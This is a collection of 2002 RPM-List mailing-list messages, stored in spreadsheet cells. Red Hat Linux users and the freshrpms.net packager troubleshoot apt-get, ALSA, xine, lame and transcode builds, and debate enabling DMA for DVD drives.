Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms release
Hit http://apt.freshrpms.net redhat/8.0/en/i386/os srclist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates srclist
Get:2 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms srclist [12.6kB]
Fetched 64.4kB in 2s (30.1kB/s)
Reading Package Lists... Done
root@canarsie:/tmp # apt-get install lame
Reading Package Lists... Done
Building Dependency Tree... Done
E: Couldn't find package lameroot@canarsie:/var/cache/apt # ls -ltr
total 148
drwxr-xr-x    2 root     root         4096 Sep 29 10:49 gensrclist
drwxr-xr-x    2 root     root         4096 Sep 29 10:49 genpkglist
drwxr-xr-x    3 root     root         4096 Sep 29 10:49 archives
-rw-r--r--    1 root     root        49863 Oct  4 16:00 srcpkgcache.bin
-rw-r--r--    1 root     root       158131 Oct  4 16:00 pkgcache.bin
root@canarsie:/var/cache/apt # date
Fri Oct  4 16:03:15 EDT 2002So, it looks like it worked, and the files are updated..  very strange.  Maybe something went wrong updating apt from my old version (as used
with rh7.2), and this one.  Lemme try totally uninstalling and
reinstalling it..root@canarsie:/ # rpm -e apt synaptic
warning: /etc/apt/sources.list saved as /etc/apt/sources.list.rpmsave
root@canarsie:/ # ls -l /etc/apt
total 4
-rw-r--r--    1 root     root         1610 Oct  4 10:07
sources.list.rpmsave
root@canarsie:/ # rpm -ivh /tmp/apt-0.5.4cnc7-fr1.i386.rpm
warning: /tmp/apt-0.5.4cnc7-fr1.i386.rpm: V3 DSA signature: NOKEY, key
ID e42d547b
Preparing...                ###########################################
[100%]
   1:apt                    ###########################################
[100%]
root@canarsie:/ # apt-get update
Ign http://apt.freshrpms.net redhat/8.0/en/i386 release
Hit http://apt.freshrpms.net redhat/8.0/en/i386/os pkglist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/os release
Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates pkglist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates release
Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms pkglist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms release
Hit http://apt.freshrpms.net redhat/8.0/en/i386/os srclist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates srclist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms srclist
Reading Package Lists... Done
root@canarsie:/ # apt-get install synaptic
Reading Package Lists... Done
Building Dependency Tree... Done
E: Couldn't find package synaptic
root@canarsie:/ #Still no go...I'm stumped.-SteveK&gt; 
&gt; Matthias
&gt; 
-- 
  Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
                HorizonLive.com - collaborate . interact . learn
   "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote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simulator).Well, I'm sure you can recompile those game packages without ALSA anyway.
Also, note that ALSA 0.9.x has just appeared in Mandrake 9.0 and that all
previous Mandrake releases were using the incompatible, aging and now
unsupported 0.5.x series. (unless I've misunderstood)&gt;     How much 'hacking' is likely required to make it work for an
&gt;     SBLive/emu10k1 soundcard?Near to none, it should be quite straightforward :
http://freshrpms.net/docs/alsa/The only tricky part is editing the /etc/modules.conf file, but the ALSA
Soundcard Matrix has a page for every supported card with a section you can
most of the time simply copy and paste!I really think that with my ALSA packages, ALSA on Red Hat Linux has never
been so easy! ;-)Cheers,
Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.00 0.07 0.17, AC on-line, battery charging: 100% (1:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@rpmforge.net) wrote*:
&gt;I really think that with my ALSA packages, ALSA on Red Hat Linux has never
&gt;been so easy! ;-)I had been hand building those alsa packages for probably 6 months or more, so I
could use my laptop's ESS chip best (hard disk recording and such). Wow, maybe 8 to
10 months, time flys. I didn't look forward to doing that tedious build every time I
changed a kernel or something. Matthias has made this a thing of the past! Dude,
it's a no brainer, use apt-get or just download and install.What's more, OSS is fully "imitated", older apps using OSS are as happy as a clam.
My personal taste tells me newer apps which use alsa sound better (alsaplayer, xmms
with alsa module) to my ear.The 2 things that trick people are the modules.conf file, they didn't have that
automatic matrix page when I started with alsa, you don't know how good you have it.And on my old installs (only the first time I installed it on a clean box), alsa
always was "muted" until you fire up a mixer and turn up the music. It's possible
Matthias even took care of that too. Anyway it is/was only a one time thing on 1st
install, that was a long time ago for me.Those ALSA dudes had been trying to get it into the 2.4 kernel but missed it, but
it's been in 2.5 for a while now, so alsa is the future of sound in the linux kernel.--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Haase wrote:
&gt; RH ships the code with the bytecode hinter disabled which makes 
&gt; non-AA fonts really ugly.
&gt; This reqiures only a small change for include/freetype/config/ftoption.h,
&gt; it is very well documented.Red Hat 8.0 ships with the bytecode hinter enabled; I think 7.3 may have 
as well.The enabling change to "ftoption.h" is made by Red Hat's SRPM before 
building.  Take a look at "freetype-2.1.1-enable-ft2-bci.patch" from the 
SRPM; it's pretty clear that this does exactly what needs to be done.So if your fonts look ugly, lack of bytecode hinting is *not* the cause.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I can't seem to build this package. It errors out because rpm found 
files not included in any of the packages. I tried getting them addes 
(it's the documentation that is being loaded) and was unsuccessful. 
Anyone get this to work?Coy
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On a RH 8 box, I'm trying to install your package
xine-0.9.13-fr5.i386.rpm, I keep running into dependency problems.  I've
tried to install the dev and lib rpm's as well and they error out with
dependency problems on each other (they each want something from the
other's package).I've tried the --without options, but still end up with (similar for the
regular package),	glut is needed by xine-libs-0.9.13-fr5
        aalib is needed by xine-libs-0.9.13-fr5
        lirc is needed by xine-libs-0.9.13-fr5
        libaa.so.1 is needed by xine-libs-0.9.13-fr5
        libglut.so.3 is needed by xine-libs-0.9.13-fr5What am I missing here?Thanks for your efforts.
QuaffAPint
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On 04 Oct 2002 22:25:31 -0400, QuaffA Pint  wrote:&gt; On a RH 8 box, I'm trying to install your package
&gt; xine-0.9.13-fr5.i386.rpm, I keep running into dependency problems.  I've
&gt; tried to install the dev and lib rpm's as well and they error out with
&gt; dependency problems on each other (they each want something from the
&gt; other's package).
&gt; 
&gt; I've tried the --without options, but still end up with (similar for the
&gt; regular package),
&gt; 
&gt; 	glut is needed by xine-libs-0.9.13-fr5
&gt;         aalib is needed by xine-libs-0.9.13-fr5
&gt;         lirc is needed by xine-libs-0.9.13-fr5
&gt;         libaa.so.1 is needed by xine-libs-0.9.13-fr5
&gt;         libglut.so.3 is needed by xine-libs-0.9.13-fr5
&gt; 
&gt; What am I missing here?    "apt-get install xine".  It'll find all these.  Oh, and I'm told that Redhat 8.0 will also suggest things like this for ya. (Not apt, but the actual package names you need)------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
Just machines, to make big decisions- programmed by fellas with
compassion and vision.  We'll be clean when that work is done;
Eternally free and eternally young.  Linux._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Coy wrote :&gt; I can't seem to build this package. It errors out because rpm found 
&gt; files not included in any of the packages. I tried getting them addes 
&gt; (it's the documentation that is being loaded) and was unsuccessful. 
&gt; Anyone get this to work?Hi,Could you post the list of files in question? Maybe more docs get generated
when a certain doc tool is installed and that I didn't have it installed
when I rebuilt the package :-/Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.06 0.12 0.09, AC on-line, battery charging: 100% (1:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Oct 02, 2002 at 10:45:04PM +0200, Matthias Saou wrote:
&gt; &gt; So I've attached a patch to specify an alternate kernel by setting the
&gt; &gt; "TARGET_KERNEL" environment variable before running rpmbuild. You
&gt; &gt; still need to have the rpm for the specified kernel installed, but at
&gt; &gt; least it doesn't have to be currently running. It's kinda hackish, so
&gt; &gt; if someone has a better way to do this, let me know.
&gt; 
&gt; That idea looks good although it maybe needs to be tweaked a bit more (what
&gt; you sent doesn't support packages named "kernel-smp"). I'd also prefer a
&gt; cleaner way than the env variable, and preferrably not editing the spec...
&gt; probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough?
&gt; The BuildRequires on "kernel-source" will also need to be removed because
&gt; it won't necessarily need to be true, and that does bug me a bit :-/The "--define" is exactly what I was looking for! I was trying to
figure out a way to do it within the mechanism of rpm (like the
"--with" switches), but for some reason didn't think of using
"--define". My computer is currently gone for repairs, but once it's
back, I'll rewrite the specfile, add support for kernel-smp, and email
it to the list for further criticism :)As far as requiring kernel-source, I don't feel it's a big problem. If
you're gonna go to the trouble of packaging custom kernels into rpms,
it's not a far stretch to package the source tree too (as I currently
do).Also, I've found that the alsa-driver source needs a usb-related patch 
to compile under the latest test kernels (2.4.20-preX). Are other 
people seeing the same thing, or is this just a problem with my setup?garyP.S. If I didn't mention it before, thanks for the alsa packages! They 
greatly simplified what used to take way too long before._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, QuaffA wrote :&gt; I've tried the --without options, but still end up with (similar for the
&gt; regular package),
&gt; 
&gt; 	glut is needed by xine-libs-0.9.13-fr5You need to install the "glut" package from Red Hat Linux 8.0 (and
"glut-devel" if you intend to recompile the source rpm).&gt;         aalib is needed by xine-libs-0.9.13-fr5
&gt;         lirc is needed by xine-libs-0.9.13-fr5
&gt;         libaa.so.1 is needed by xine-libs-0.9.13-fr5
&gt;         libglut.so.3 is needed by xine-libs-0.9.13-fr5Here you need both "aalib" and "lirc" from freshrpms.net. They're small,
they can be quite useful, that's why I've compiled xine with them as a
default.
You should be able to get rid of those two though, by rebuilding the source
rpm (otherwise it's a bug in my packaging!) :
rpmbuild --rebuild --without aalib --without lirc xine*.src.rpmMatthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.06 0.13 0.09, AC on-line, battery charging: 100% (1:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Matthias...After installing those packages Xine now installs
fine.  Guess I shoulda figured that one out...Thanks...
QuaffAPint_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 04 Oct 2002 16:07:12 -0700
Ben Liblit  wrote:&gt; So if your fonts look ugly, lack of bytecode hinting is *not* the cause.Well you are right, sorry, I didn't have any better idea yesterday late in
the evening.
The fonts are ugly only inside of gnome2 and clean for gnome1 apps, if
antialiasing is disabled. 
This is difficult to understand for me.--
regards from Germany
                   Matthias
      _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias said:&gt;Could you post the list of files in question?Sure. I used the following command to rebuild the package:rpmbuild --rebuild --target i586 lame-3.92-fr5.src.rpmAnd here is the error output for the files:RPM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/usr/share/doc/lame/html/switchs.htmlCoy_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 5 Oct 2002, Coy Krill wrote:&gt; Sure. I used the following command to rebuild the package:
&gt; 
&gt; rpmbuild --rebuild --target i586 lame-3.92-fr5.src.rpm
&gt; 
&gt; And here is the error output for the files:
&gt; 
&gt; RPM build errors:
&gt;     user dude does not exist - using root
&gt;     user dude does not exist - using rootharmless ...&gt;     Installed (but unpackaged) file(s) found:
&gt;    /usr/share/doc/lame/html/basic.html
&gt;    /usr/share/doc/lame/html/contributors.html
&gt;    /usr/share/doc/lame/html/examples.html
&gt;    /usr/share/doc/lame/html/history.html
This is a problem with the .spec file not accounting for all 
the files produced.  see: 
  http://www.rpm.org/hintskinks/unpackaged-files/   -- Russ Herrold
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Same as in mplayer src package
the --with and --without not working correctly
I do --without arts and it still want to install with artsRoi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :&gt; Same as in mplayer src package
&gt; the --with and --without not working correctly
&gt; I do --without arts and it still want to install with artsThis time the problem seems to be that I overestimated xine-lib's configure
script as it seems that it doesn't support disabling arts... so if you have
arts-devel installed, its support will be compiled in :-/Also, I had made another mistake and added the configure option to disable
lirc ot xine-lib when it should have been for xine-ui.All this is fixed in the upcoming "fr6" release.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.08 0.15 0.11, AC on-line, battery charging: 100% (1:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">hdparm -d1 /dev/hdc says Operation not Permitted.
DVD playback is very jumpy.
Does someone have any ideas on what I can do yo get DMA transfers?
Thanks Alvie
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-10-06 at 21:17, Alvie wrote:
&gt; hdparm -d1 /dev/hdc says Operation not Permitted.
&gt; DVD playback is very jumpy.
&gt; Does someone have any ideas on what I can do yo get DMA transfers?
&gt; Thanks AlvieAdd to /etc/modules.conf:options ide-cd dma=1-- 
Chris Kloiber_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you, that was exactly what I needed.
DVD works great now.
1 more problem?
Video-DVDRip worked on RH 7.3 but can't get contents of DVD, last
message is 'libdvdread: using libdvdcss 1.2.2 for DVD access'.
but it fails.On Sun, 2002-10-06 at 20:32, Chris Kloiber wrote:
&gt; On Sun, 2002-10-06 at 21:17, Alvie wrote:
&gt; &gt; hdparm -d1 /dev/hdc says Operation not Permitted.
&gt; &gt; DVD playback is very jumpy.
&gt; &gt; Does someone have any ideas on what I can do yo get DMA transfers?
&gt; &gt; Thanks Alvie
&gt; 
&gt; Add to /etc/modules.conf:
&gt; 
&gt; options ide-cd dma=1
&gt; 
&gt; -- 
&gt; Chris Kloiber
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">When I try to use apt-get upgrade
it wants to install libusb while I got it
(same version)
and all collapse because of this.Roi_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 07 Oct 2002 08:01:24 +0200, Roi Dayan  wrote:&gt; When I try to use apt-get upgrade
&gt; it wants to install libusb while I got it
&gt; (same version)
&gt; and all collapse because of this.    I had that too; I removed libusb (I don't think it needed --nodeps) and then 'apt-get -f install' and all was well.------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
angegangen, Schlange-HÃ¼ften, sein es ganz rÃ¼ber jetzt. BÃ¼gel innen fest,
weil es eine lange, sÃ¼sse Fahrt ist. _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,In my build scripts, I have problems with some of the kernel packages.For kernel-sources, I get :Package kernel-source is a virtual package provided by:
  kernel-source#2.4.18-3 2.4.18-3
  kernel-source#2.4.18-3 2.4.18-3on running apt-get install kernel-sourceNow, first of all, this doesn't really tell me what the two options are ;)
Second, is there some way I can tell apt-get to install either ? This is 
done from automatic build scripts so I'd like it to proceed anyway.Thanks,
Thomas-- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
I'm alive.
I can tell because of the pain.
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 09:56, Matthias Saou wrote:&gt; &gt; Thank you, that was exactly what I needed.
&gt; &gt; DVD works great now.
&gt; 
&gt; BTW, I think I'll kake it so that my ogle package automatically inserts
&gt; this "options ide-cd dma=1" to /etc/modules.conf! It currently creates the
&gt; /dev/dvd link to /dev/cdrom (which will work most of the time, if there's
&gt; only one drive) if no /dev/dvd exists.Eek.  Maybe it's just me, but I don't think that's a good idea. 
Outputting a message in %post and providing a README of some kind would
be better, as well as perhaps adding a note in %description.-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :&gt; &gt; BTW, I think I'll kake it so that my ogle package automatically inserts
&gt; &gt; this "options ide-cd dma=1" to /etc/modules.conf! It currently creates
&gt; &gt; the/dev/dvd link to /dev/cdrom (which will work most of the time, if
&gt; &gt; there's only one drive) if no /dev/dvd exists.
&gt; 
&gt; Eek.  Maybe it's just me, but I don't think that's a good idea. 
&gt; Outputting a message in %post and providing a README of some kind would
&gt; be better, as well as perhaps adding a note in %description.Why "Eek"? :-)
If no /dev/dvd exists, it'll create it.
If /dev/dvd exists, it won't touch it.
If someone installs ogle (a DVD player), I'm assuming the hardware is
recent enough for software playback and that the drive is a DVD-ROM... all
of them support DMA! But since that change requires a reboot or a manual
change, I'm still hesitating to integrate it :-/My goal is to allow users to install a DVD player through synaptic and play
DVDs in no time. Outputting a message in the %post section of a package is
always a bad idea, putting the tip in the %description sounds good though.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.07 0.14 0.16_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 08:59, Matthias Saou wrote:
&gt; Once upon a time, Alvie wrote :
&gt; 
&gt; &gt; Thanks, I seem to be having problems with rebuilding transcode from SRC
&gt; &gt; it gets confused from previous errors and gives up.
&gt; 
&gt; Could you give the output of the error?
&gt;This is only the last part of it.I used 'rpmbuild --rebuild --without avifile transcode.0.6.1-fr2.src.rpm'.
af6_decore.cpp:305: 'WAVEFORMATEX' is used as a type, but is not defined
as a
   type.
af6_decore.cpp:306: parse error before `if'
af6_decore.cpp:308: syntax error before `-&gt;' token
af6_decore.cpp:313: `wvFmt' was not declared in this scope
af6_decore.cpp:313: `avm_wave_format_name' was not declared in this
scope
af6_decore.cpp:314: `wvFmt' was not declared in this scope
af6_decore.cpp:315: `wvFmt' was not declared in this scope
af6_decore.cpp:316: `wvFmt' was not declared in this scope
af6_decore.cpp:316: ISO C++ forbids declaration of `fprintf' with no
type
af6_decore.cpp:316: redefinition of `int fprintf'
af6_decore.cpp:161: `int fprintf' previously defined here
af6_decore.cpp:316: initializer list being treated as compound
expression
af6_decore.cpp:317: 'WAVEFORMATEX' is used as a type, but is not defined
as a
   type.
af6_decore.cpp:318: syntax error before `-&gt;' token
af6_decore.cpp:321: `fmt' was not declared in this scope
af6_decore.cpp:321: `avm_wave_format_name' was not declared in this
scope
af6_decore.cpp:322: `fmt' was not declared in this scope
af6_decore.cpp:323: `fmt' was not declared in this scope
af6_decore.cpp:324: `fmt' was not declared in this scope
af6_decore.cpp:324: ISO C++ forbids declaration of `fprintf' with no
type
af6_decore.cpp:324: redefinition of `int fprintf'
af6_decore.cpp:316: `int fprintf' previously defined here
af6_decore.cpp:324: initializer list being treated as compound
expression
af6_decore.cpp:327: parse error before `if'
af6_decore.cpp:330: syntax error before `-&gt;' token
af6_decore.cpp:349: ISO C++ forbids declaration of `samples' with no
type
af6_decore.cpp:349: conflicting types for `int samples'
af6_decore.cpp:290: previous declaration as `unsigned int samples'
af6_decore.cpp:349: `fmt' was not declared in this scope
af6_decore.cpp:350: ISO C++ forbids declaration of `buffer_size' with no
type
af6_decore.cpp:350: conflicting types for `int buffer_size'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af6_decore.cpp:208: `int fflush' previously defined here
af6_decore.cpp:359: invalid conversion from `_IO_FILE*' to `int'
af6_decore.cpp:360: `ipipe' was not declared in this scope
af6_decore.cpp:360: `sync_str' was not declared in this scope
af6_decore.cpp:360: `sync_str' was not declared in this scope
af6_decore.cpp:360: ISO C++ forbids declaration of `p_write' with no
type
af6_decore.cpp:360: redefinition of `int p_write'
af6_decore.cpp:209: `int p_write' previously defined here
af6_decore.cpp:360: initializer list being treated as compound
expression
af6_decore.cpp:363: parse error before `while'
af6_decore.cpp:368: syntax error before `-&gt;' token
make[3]: *** [af6_decore.lo] Error 1
make[3]: Leaving directory
`/usr/src/redhat/BUILD/transcode-0.6.1/import'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory
`/usr/src/redhat/BUILD/transcode-0.6.1/import'
&gt; &gt; Using trancode rpm I can't get transcode command line args to
&gt; &gt; work.Although it's been a while since I used it - maybe I forgot how!
&gt;
This was a dumb mistake on my part. I did'nt have libdvdcss-devel, the
transcode command line args work fine now, but not so for DVD::RIP.
Thanks for help
Alvie
&gt; I'm encoding a DVD to DivX4 right now on my home computer, and it works
&gt; fine. My current Red Hat 8.0 build of transcode has avifile support
&gt; disabled, that may be your problem? It's because gcc 3.2 isn't currently
&gt; able to recompile avifile... :-/
&gt; 
&gt; Matthias
&gt; 
&gt; -- 
&gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
&gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
&gt; Load : 0.09 0.12 0.21
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Alvie wrote :&gt; This is only the last part of it.I used 'rpmbuild --rebuild --without
&gt; avifile transcode.0.6.1-fr2.src.rpm'.&gt; af6_decore.cpp:305: 'WAVEFORMATEX'
&gt; is used as a type, but is not defined as a
&gt;    type.
&gt; af6_decore.cpp:306: parse error before `if'
[...]All of these "af6" are related to avifile6 support :-/
Normally, my 0.6.1-fr2 build of transcode defaults to *not* use avifile,
but you can use "--with avifile6" to force recompiling against it.Do you have an old avifile installed maybe?
Can you check the "./configure ..." line run at the beginning of the
rebuild process to see if it does include the "--without-avifile6" option?Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.23 0.14 0.14_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 19:36, Matthias Saou wrote:&gt; &gt; Eek.  Maybe it's just me, but I don't think that's a good idea. 
&gt; &gt; Outputting a message in %post and providing a README of some kind would
&gt; &gt; be better, as well as perhaps adding a note in %description.
&gt; 
&gt; Why "Eek"? :-)
&gt; If no /dev/dvd exists, it'll create it.
&gt; If /dev/dvd exists, it won't touch it.I assume that you won't %ghost or remove these and the modules.conf
change on uninstall, though.  So people who are installing this RPM and
are unfortunate enough to have a DVD drive (or just an ordinary CD,
non-DVD drive) that doesn't support DMA will be left with a system
without a working CD drive, even after removing the RPM.  And without
ever knowing what struck them.  You can't remove the DMA setting from
modules.conf either unless you're sure that ogle added it there and
nothing else needs it.The /dev stuff isn't that dangerous, but the modules.conf change can
be.  That's why "Eek" :)&gt; If someone installs ogle (a DVD player), I'm assuming the hardware is
&gt; recent enough for software playback and that the drive is a DVD-ROM... all
&gt; of them support DMA! But since that change requires a reboot or a manual
&gt; change, I'm still hesitating to integrate it :-/A worthy goal...&gt; My goal is to allow users to install a DVD player through synaptic and play
&gt; DVDs in no time. Outputting a message in the %post section of a package is
&gt; always a bad idea, putting the tip in the %description sounds good though.How about splitting the creation of the symlinks and modules.conf
modifications into a separate RPM?-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :&gt; I assume that you won't %ghost or remove these and the modules.conf
&gt; change on uninstall, though.  So people who are installing this RPM and
&gt; are unfortunate enough to have a DVD drive (or just an ordinary CD,
&gt; non-DVD drive) that doesn't support DMA will be left with a system
&gt; without a working CD drive, even after removing the RPM.  And without
&gt; ever knowing what struck them.  You can't remove the DMA setting from
&gt; modules.conf either unless you're sure that ogle added it there and
&gt; nothing else needs it.I've never heard of any CD-ROM or DVD-ROM drive having problems with DMA...
although there probably is since Red Hat decided to default disabling it a
few releases back :-/
Normally, even if you try to enable DMA and your device doesn't support it,
it simply don't be able to make the change, and that's it. The problem IIRC
is with crappy hardware that is supposed to support DMA but doesn't work as
expected when it's enabled... maybe Chris could confirm this? ;-)I guess I'll settle for the /dev/dvd link change as described and putting
the DMA tip in the %description :-)Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.00 0.05 0.14_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">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&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002 19:28:51 +0200
Matthias Saou  wrote:# I've never heard of any CD-ROM or DVD-ROM drive having problems with
# DMA... although there probably is since Red Hat decided to default
# disabling it a few releases back :-/When I worked as a PC repair tech for a Computer store chain, I did
run across quite a few DVD drives that would lock up if DMA was
enabled.  It's more of a chipset/drive problem than a Drive by itself.-- 
Jesse Keating
j2Solutions.net
Mondo DevTeam (www.mondorescue.org)Was I helpful?  Let others know:
 http://svcs.affero.net/rm.php?r=jkeating_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jesse wrote :&gt; When I worked as a PC repair tech for a Computer store chain, I did
&gt; run across quite a few DVD drives that would lock up if DMA was
&gt; enabled.  It's more of a chipset/drive problem than a Drive by itself.Chipset? Let me guess : VIA or SiS? :-))))
OK, so I'll follow Red Hat's choice of leaving the DMA setting alone and
orienting the users to some page explaining how to enable it "at your own
risk" ;-)Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.03 0.09 0.10_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 20:28, Matthias Saou wrote:&gt; I guess I'll settle for the /dev/dvd link change as described and putting
&gt; the DMA tip in the %description :-)Thanks, I'll sleep better now :)-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Any plans for rolling Nessus RPMs for RH8?  Miss it already...-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :&gt; Any plans for rolling Nessus RPMs for RH8?  Miss it already...Well, that's one of the 10 rpm-related mails leftover in my inbox I just
mentionned privately ;-)
As it's a big piece and needs some testing, I'm just bit lazy about it :-/I'll try to packages it asap, or at least put up a "testing" version first
in case I fear some imperfections.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
